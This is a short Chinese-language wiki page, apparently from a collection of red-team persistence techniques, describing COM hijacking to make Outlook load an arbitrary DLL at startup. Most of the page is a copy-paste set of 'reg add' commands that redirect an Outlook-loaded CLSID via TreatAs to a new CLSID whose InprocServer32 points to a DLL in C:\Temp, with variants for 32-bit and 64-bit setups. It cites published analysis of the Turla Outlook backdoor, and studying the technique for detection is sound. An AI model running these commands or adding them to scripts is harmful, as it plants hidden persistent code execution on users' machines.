COM劫持

Outlook在启动时会加载多个COM对象,我们可以通过修改注册表的方式劫持Outlook的启动过程,用来加载DLL。

#32bit office on 32bit windows/64bit office on 64bit windows
reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f
#32bit office on 64bit windows
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f

参考文章:

LogoTurla: In and out of its unique Outlook backdoor | WeLiveSecurityWeLiveSecurity
3gstudent-Blog3gstudent-Blog

上一页模板文件下一页BITS Jobs

最后更新于

这有帮助吗?